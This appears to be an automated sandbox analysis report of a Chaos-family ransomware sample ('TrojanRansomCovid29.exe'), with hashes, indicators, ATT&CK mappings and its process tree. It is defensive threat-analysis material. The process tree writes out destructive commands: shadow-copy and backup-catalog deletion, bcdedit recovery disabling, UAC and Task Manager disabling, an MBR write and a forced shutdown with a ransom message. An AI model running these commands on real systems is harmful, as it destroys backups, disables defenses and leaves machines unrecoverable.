Analysis
-
max time kernel
187s -
max time network
302s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-11-2024 03:55
Behavioral task
behavioral1
Sample
TrojanRansomCovid29.exe
Resource
win11-20241007-en
General
-
Target
TrojanRansomCovid29.exe
-
Size
542KB
-
MD5
9f0563f2faaf6b9a0f7b3cf058ac80b6
-
SHA1
244e0ff0a5366c1607f104e7e7af4949510226ec
-
SHA256
a8054338891db7231f9885ca0d3bc90a651c63878ff603ede5c3efafa7e25254
-
SHA512
40cdf4c754977e60c233417e42a62be02f9b5bfe239c0378664c28757ce6ce1fc3b91b83d6ef6bb184c4d831761f57a07255526d12a3a955c3b473bddb97f4c9
-
SSDEEP
12288:xBv407Pg09KyclZbmoYsp8L/0C7Cvb3p62STTzfGGz9oSzrfI:xh5rgjycXbm0K/EzQl/xDrfI
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 4 IoCs
resource yara_rule behavioral1/files/0x001a00000002aae8-26.dat family_chaos behavioral1/memory/4244-33-0x0000000000A40000-0x0000000000A60000-memory.dmp family_chaos behavioral1/memory/4484-100-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos behavioral1/memory/4484-104-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos -
Chaos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3928 bcdedit.exe 3076 bcdedit.exe -
pid Process 1740 wbadmin.exe -
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe -
Executes dropped EXE 4 IoCs
pid Process 708 mbr.exe 4244 Cov29Cry.exe 3188 svchost.exe 4896 Cov29LockScreen.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2410826464-2353372766-2364966905-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\swc45oaza.jpg" svchost.exe -
resource yara_rule behavioral1/memory/4484-0-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/4484-100-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/4484-104-0x0000000000400000-0x00000000005D5000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cov29LockScreen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TrojanRansomCovid29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbr.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5080 PING.EXE 4548 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4208 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4932 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings svchost.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 4996 reg.exe 2324 reg.exe 1560 reg.exe 1140 reg.exe 3952 reg.exe 4896 reg.exe 3632 reg.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4548 PING.EXE 5080 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3188 svchost.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 4244 Cov29Cry.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe 3188 svchost.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeDebugPrivilege 4244 Cov29Cry.exe Token: SeShutdownPrivilege 3856 shutdown.exe Token: SeRemoteShutdownPrivilege 3856 shutdown.exe Token: SeDebugPrivilege 3188 svchost.exe Token: SeBackupPrivilege 1668 vssvc.exe Token: SeRestorePrivilege 1668 vssvc.exe Token: SeAuditPrivilege 1668 vssvc.exe Token: SeIncreaseQuotaPrivilege 4348 WMIC.exe Token: SeSecurityPrivilege 4348 WMIC.exe Token: SeTakeOwnershipPrivilege 4348 WMIC.exe Token: SeLoadDriverPrivilege 4348 WMIC.exe Token: SeSystemProfilePrivilege 4348 WMIC.exe Token: SeSystemtimePrivilege 4348 WMIC.exe Token: SeProfSingleProcessPrivilege 4348 WMIC.exe Token: SeIncBasePriorityPrivilege 4348 WMIC.exe Token: SeCreatePagefilePrivilege 4348 WMIC.exe Token: SeBackupPrivilege 4348 WMIC.exe Token: SeRestorePrivilege 4348 WMIC.exe Token: SeShutdownPrivilege 4348 WMIC.exe Token: SeDebugPrivilege 4348 WMIC.exe Token: SeSystemEnvironmentPrivilege 4348 WMIC.exe Token: SeRemoteShutdownPrivilege 4348 WMIC.exe Token: SeUndockPrivilege 4348 WMIC.exe Token: SeManageVolumePrivilege 4348 WMIC.exe Token: 33 4348 WMIC.exe Token: 34 4348 WMIC.exe Token: 35 4348 WMIC.exe Token: 36 4348 WMIC.exe Token: SeIncreaseQuotaPrivilege 4348 WMIC.exe Token: SeSecurityPrivilege 4348 WMIC.exe Token: SeTakeOwnershipPrivilege 4348 WMIC.exe Token: SeLoadDriverPrivilege 4348 WMIC.exe Token: SeSystemProfilePrivilege 4348 WMIC.exe Token: SeSystemtimePrivilege 4348 WMIC.exe Token: SeProfSingleProcessPrivilege 4348 WMIC.exe Token: SeIncBasePriorityPrivilege 4348 WMIC.exe Token: SeCreatePagefilePrivilege 4348 WMIC.exe Token: SeBackupPrivilege 4348 WMIC.exe Token: SeRestorePrivilege 4348 WMIC.exe Token: SeShutdownPrivilege 4348 WMIC.exe Token: SeDebugPrivilege 4348 WMIC.exe Token: SeSystemEnvironmentPrivilege 4348 WMIC.exe Token: SeRemoteShutdownPrivilege 4348 WMIC.exe Token: SeUndockPrivilege 4348 WMIC.exe Token: SeManageVolumePrivilege 4348 WMIC.exe Token: 33 4348 WMIC.exe Token: 34 4348 WMIC.exe Token: 35 4348 WMIC.exe Token: 36 4348 WMIC.exe Token: SeBackupPrivilege 3404 wbengine.exe Token: SeRestorePrivilege 3404 wbengine.exe Token: SeSecurityPrivilege 3404 wbengine.exe Token: SeDebugPrivilege 4932 taskkill.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1772 PickerHost.exe 4896 Cov29LockScreen.exe 4208 PickerHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4484 wrote to memory of 3776 4484 TrojanRansomCovid29.exe 77 PID 4484 wrote to memory of 3776 4484 TrojanRansomCovid29.exe 77 PID 4484 wrote to memory of 3776 4484 TrojanRansomCovid29.exe 77 PID 3776 wrote to memory of 5072 3776 cmd.exe 81 PID 3776 wrote to memory of 5072 3776 cmd.exe 81 PID 3776 wrote to memory of 5072 3776 cmd.exe 81 PID 3776 wrote to memory of 4548 3776 cmd.exe 82 PID 3776 wrote to memory of 4548 3776 cmd.exe 82 PID 3776 wrote to memory of 4548 3776 cmd.exe 82 PID 3776 wrote to memory of 2324 3776 cmd.exe 83 PID 3776 wrote to memory of 2324 3776 cmd.exe 83 PID 3776 wrote to memory of 2324 3776 cmd.exe 83 PID 3776 wrote to memory of 1560 3776 cmd.exe 84 PID 3776 wrote to memory of 1560 3776 cmd.exe 84 PID 3776 wrote to memory of 1560 3776 cmd.exe 84 PID 3776 wrote to memory of 1140 3776 cmd.exe 85 PID 3776 wrote to memory of 1140 3776 cmd.exe 85 PID 3776 wrote to memory of 1140 3776 cmd.exe 85 PID 3776 wrote to memory of 3952 3776 cmd.exe 86 PID 3776 wrote to memory of 3952 3776 cmd.exe 86 PID 3776 wrote to memory of 3952 3776 cmd.exe 86 PID 3776 wrote to memory of 4896 3776 cmd.exe 87 PID 3776 wrote to memory of 4896 3776 cmd.exe 87 PID 3776 wrote to memory of 4896 3776 cmd.exe 87 PID 3776 wrote to memory of 3632 3776 cmd.exe 88 PID 3776 wrote to memory of 3632 3776 cmd.exe 88 PID 3776 wrote to memory of 3632 3776 cmd.exe 88 PID 3776 wrote to memory of 4996 3776 cmd.exe 89 PID 3776 wrote to memory of 4996 3776 cmd.exe 89 PID 3776 wrote to memory of 4996 3776 cmd.exe 89 PID 3776 wrote to memory of 708 3776 cmd.exe 90 PID 3776 wrote to memory of 708 3776 cmd.exe 90 PID 3776 wrote to memory of 708 3776 cmd.exe 90 PID 3776 wrote to memory of 4244 3776 cmd.exe 91 PID 3776 wrote to memory of 4244 3776 cmd.exe 91 PID 3776 wrote to memory of 3856 3776 cmd.exe 92 PID 3776 wrote to memory of 3856 3776 cmd.exe 92 PID 3776 wrote to memory of 3856 3776 cmd.exe 92 PID 3776 wrote to memory of 5080 3776 cmd.exe 94 PID 3776 wrote to memory of 5080 3776 cmd.exe 94 PID 3776 wrote to memory of 5080 3776 cmd.exe 94 PID 4244 wrote to memory of 3188 4244 Cov29Cry.exe 97 PID 4244 wrote to memory of 3188 4244 Cov29Cry.exe 97 PID 3188 wrote to memory of 2584 3188 svchost.exe 98 PID 3188 wrote to memory of 2584 3188 svchost.exe 98 PID 2584 wrote to memory of 4208 2584 cmd.exe 100 PID 2584 wrote to memory of 4208 2584 cmd.exe 100 PID 2584 wrote to memory of 4348 2584 cmd.exe 103 PID 2584 wrote to memory of 4348 2584 cmd.exe 103 PID 3188 wrote to memory of 5024 3188 svchost.exe 105 PID 3188 wrote to memory of 5024 3188 svchost.exe 105 PID 5024 wrote to memory of 3928 5024 cmd.exe 107 PID 5024 wrote to memory of 3928 5024 cmd.exe 107 PID 5024 wrote to memory of 3076 5024 cmd.exe 108 PID 5024 wrote to memory of 3076 5024 cmd.exe 108 PID 3188 wrote to memory of 2880 3188 svchost.exe 109 PID 3188 wrote to memory of 2880 3188 svchost.exe 109 PID 2880 wrote to memory of 1740 2880 cmd.exe 111 PID 2880 wrote to memory of 1740 2880 cmd.exe 111 PID 3188 wrote to memory of 1888 3188 svchost.exe 116 PID 3188 wrote to memory of 1888 3188 svchost.exe 116 PID 3776 wrote to memory of 4932 3776 cmd.exe 118 PID 3776 wrote to memory of 4932 3776 cmd.exe 118 PID 3776 wrote to memory of 4932 3776 cmd.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\TrojanRansomCovid29.exe"C:\Users\Admin\AppData\Local\Temp\TrojanRansomCovid29.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\79E3.tmp\TrojanRansomCovid29.bat" "2⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\79E3.tmp\fakeerror.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:5072
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 23⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4548
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2324
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1560
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1140
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3952
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4896
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3632
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4996
-
-
C:\Users\Admin\AppData\Local\Temp\79E3.tmp\mbr.exembr.exe3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:708
-
-
C:\Users\Admin\AppData\Local\Temp\79E3.tmp\Cov29Cry.exeCov29Cry.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:4208
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:3928
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:3076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:1740
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt5⤵PID:1888
-
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 93⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5080
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
C:\Users\Admin\AppData\Local\Temp\79E3.tmp\Cov29LockScreen.exeCov29LockScreen.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4896
-
-
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1772
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1520
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:2400
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4208
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
3Pre-OS Boot
1Bootkit
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
103KB
MD58bcd083e16af6c15e14520d5a0bd7e6a
SHA1c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA51235999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a
-
Filesize
48KB
MD5f724c6da46dc54e6737db821f9b62d77
SHA1e35d5587326c61f4d7abd75f2f0fc1251b961977
SHA2566cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c
SHA5126f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc
-
Filesize
1KB
MD557f0432c8e31d4ff4da7962db27ef4e8
SHA1d5023b3123c0b7fae683588ac0480cd2731a0c5e
SHA256b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc
SHA512bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf
-
Filesize
144B
MD5c0437fe3a53e181c5e904f2d13431718
SHA144f9547e7259a7fb4fe718e42e499371aa188ab6
SHA256f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22
SHA512a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3
-
Filesize
1.3MB
MD535af6068d91ba1cc6ce21b461f242f94
SHA1cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA2569ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169
-
Filesize
861B
MD5c53dee51c26d1d759667c25918d3ed10
SHA1da194c2de15b232811ba9d43a46194d9729507f0
SHA256dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
SHA512da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c